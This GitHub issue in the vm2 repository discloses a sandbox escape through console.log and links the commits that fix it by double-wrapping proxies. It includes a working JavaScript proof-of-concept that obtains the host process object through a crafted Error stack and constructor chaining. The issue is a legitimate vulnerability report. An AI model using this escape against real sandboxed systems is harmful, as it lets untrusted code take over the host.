Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Breakout with console.log #241

Closed
XmiliaH opened this issue Sep 13, 2019 · 0 comments · Fixed by #242
Closed

Breakout with console.log #241

XmiliaH opened this issue Sep 13, 2019 · 0 comments · Fixed by #242

Comments

@XmiliaH
Copy link
Collaborator

XmiliaH commented Sep 13, 2019

Because console.log uses inspect and inspect violates the proxy specs by directly interacting with the target, it is possible to escape through console.log.

"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
	const bad = new Error();
	bad.__proto__ = null;
	bad.stack = {
			startsWith(){
				return true;
			},
			length: 5,
			match(outer){
				throw outer.constructor.constructor("return process")();
			}
	};
	return bad;
}+')()';
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

Only idea I have so far is to double wrap objects from the vm in two Proxys. Inspect will remove the outer one but respect the second one.

This is new in node 12, maybe was there in 8, but likely not in 10.
XmiliaH added a commit to XmiliaH/vm2 that referenced this issue Sep 13, 2019
@XmiliaH
Double wrap Objects
a7eb9dc 
Since node's inspect used by console.log strips one layer of proxys, wrap it in two.
The inner one uses a simple shared handler. Fixes patriksimek#241.
Also allow to connect a host object with a sandbox offset. This allowes to override the Buffer.prototype.inspect method with a saver, in sandbox one, fixes patriksimek#187 for now, however we should have a look if other objects expose a custom inspect method.
XmiliaH added a commit to XmiliaH/vm2 that referenced this issue Sep 13, 2019
@XmiliaH
Double wrap Objects
8260c12 
Since node's inspect used by console.log strips one layer of proxys, wrap it in two.
The inner one uses a simple shared handler. Fixes patriksimek#241.
Also allow to connect a host object with a sandbox offset. This allowes to override the Buffer.prototype.inspect method with a saver, in sandbox one, fixes patriksimek#187 for now, however we should have a look if other objects expose a custom inspect method.
@XmiliaH XmiliaH mentioned this issue Sep 13, 2019
Merged
@a0xnirudh a0xnirudh mentioned this issue Feb 28, 2020
Open
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Double wrap Objects XmiliaH/vm2
1 participant
@XmiliaH